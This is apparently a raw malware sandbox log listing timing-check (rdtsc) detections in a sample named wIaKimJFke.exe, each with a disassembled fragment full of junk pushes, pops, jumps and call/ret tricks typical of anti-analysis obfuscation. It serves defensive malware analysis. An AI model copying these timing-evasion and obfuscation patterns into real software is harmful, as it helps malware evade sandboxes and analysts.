Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E9106 second address: 6E910A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6EA224 second address: 6EA22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6EA22A second address: 6EA234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6BD391 second address: 6BD395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F6E89 second address: 6F6E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F6E95 second address: 6F6EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508872h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F7284 second address: 6F72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FED74F3E52Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FED74F3E524h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jo 00007FED74F3E516h 0x0000001c jne 00007FED74F3E516h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F72B7 second address: 6F72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FED75508872h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F76EE second address: 6F7708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F7708 second address: 6F7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 jg 00007FED75508866h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FED75508866h 0x00000017 jmp 00007FED75508874h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F7733 second address: 6F7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FAE3A second address: 6FAEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FED75508868h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FED7550886Eh 0x00000019 pushad 0x0000001a jmp 00007FED7550886Fh 0x0000001f jmp 00007FED7550886Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jg 00007FED75508868h 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 jp 00007FED75508866h 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e jmp 00007FED75508877h 0x00000043 pop eax 0x00000044 jmp 00007FED75508870h 0x00000049 push 4AB5381Bh 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FB540 second address: 6FB575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E525h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FBA00 second address: 6FBA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FC519 second address: 6FC51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FC51D second address: 6FC52B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FC52B second address: 6FC530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FE525 second address: 6FE52B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FE52B second address: 6FE530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70152F second address: 7015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007FED7550886Ch 0x0000000e pop esi 0x0000000f nop 0x00000010 jc 00007FED7550886Ch 0x00000016 or edi, 272462D9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FED75508868h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 add dword ptr [ebp+122D1B93h], ebx 0x0000003e mov edi, eax 0x00000040 mov si, cx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FED75508868h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 je 00007FED7550886Eh 0x00000066 jno 00007FED75508868h 0x0000006c push eax 0x0000006d pushad 0x0000006e jp 00007FED75508868h 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 pop esi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7067E6 second address: 7067FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E51Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7067FD second address: 706802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70775A second address: 707765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 707765 second address: 7077C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FED75508868h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D17F3h] 0x00000032 xchg eax, esi 0x00000033 jbe 00007FED75508877h 0x00000039 push edx 0x0000003a jmp 00007FED7550886Fh 0x0000003f pop edx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FED7550886Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7077C2 second address: 7077C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 708766 second address: 70876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7079B2 second address: 7079B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70876B second address: 7087AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED75508868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FED75508868h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov bh, ah 0x00000027 add dword ptr [ebp+1247B672h], ebx 0x0000002d push 00000000h 0x0000002f stc 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2383h], edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70965D second address: 709662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7088ED second address: 7088F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 709662 second address: 709668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7098A6 second address: 7098AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70A83D second address: 70A8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1D2Ah], edx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D36C8h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1820h], eax 0x0000002e mov eax, dword ptr [ebp+122D052Dh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FED74F3E518h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 nop 0x00000051 je 00007FED74F3E51Ch 0x00000057 pushad 0x00000058 push esi 0x00000059 pop esi 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FED74F3E51Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70B7F3 second address: 70B7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7105F7 second address: 7105FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7114CE second address: 7114D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70F785 second address: 70F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71080E second address: 710812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7126C7 second address: 7126D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FED74F3E51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 713571 second address: 713582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 710812 second address: 710818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 70F847 second address: 70F85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 713582 second address: 713589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7127CE second address: 7127D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7136CC second address: 7136FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FED74F3E521h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED74F3E528h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 716408 second address: 71640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF0D second address: 71BF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF13 second address: 71BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FED75508878h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FED75508877h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF55 second address: 71BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E51Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF68 second address: 71BF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF6E second address: 71BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71BF74 second address: 71BF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B6C8 second address: 71B6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B6CE second address: 71B70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FED75508866h 0x0000000a popad 0x0000000b jmp 00007FED75508870h 0x00000010 pushad 0x00000011 jno 00007FED75508866h 0x00000017 jmp 00007FED75508871h 0x0000001c jl 00007FED75508866h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B70C second address: 71B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B710 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B867 second address: 71B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B871 second address: 71B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007FED75508866h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B882 second address: 71B88C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 71B88C second address: 71B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72080A second address: 72082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7208F9 second address: 720909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 720909 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FED74F3E518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 12D87AABh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b stc 0x0000002c push dword ptr [ebp+122D0C21h] 0x00000032 jmp 00007FED74F3E51Ah 0x00000037 call dword ptr [ebp+122D244Ah] 0x0000003d pushad 0x0000003e sub dword ptr [ebp+122D1C6Ch], edi 0x00000044 xor eax, eax 0x00000046 mov dword ptr [ebp+122D1C6Ch], ecx 0x0000004c sub dword ptr [ebp+122D1C6Ch], esi 0x00000052 mov edx, dword ptr [esp+28h] 0x00000056 stc 0x00000057 mov dword ptr [ebp+122D36A8h], eax 0x0000005d jmp 00007FED74F3E521h 0x00000062 mov esi, 0000003Ch 0x00000067 stc 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D1C56h], ecx 0x00000072 lodsw 0x00000074 ja 00007FED74F3E522h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f xor dword ptr [ebp+122D1990h], edi 0x00000085 or ebx, 4FB5547Ch 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 clc 0x00000091 push eax 0x00000092 js 00007FED74F3E524h 0x00000098 push eax 0x00000099 push edx 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727940 second address: 727944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727944 second address: 72795C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FED74F3E516h 0x0000000f jne 00007FED74F3E516h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 726634 second address: 72664B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508873h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727106 second address: 727111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727261 second address: 727267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727267 second address: 727272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 727272 second address: 727278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F56B second address: 72F592 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FED74F3E531h 0x0000000c ja 00007FED74F3E516h 0x00000012 jmp 00007FED74F3E525h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F592 second address: 72F5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508877h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F5AD second address: 72F5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jc 00007FED74F3E516h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F5C2 second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FED75508868h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F5CF second address: 72F5DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F5DA second address: 72F600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FED75508866h 0x0000000d jmp 00007FED75508879h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72F72E second address: 72F74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FED74F3E516h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FED74F3E51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 72FEDD second address: 72FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED7550886Bh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7304B7 second address: 7304BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7304BB second address: 7304C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7304C9 second address: 7304D3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
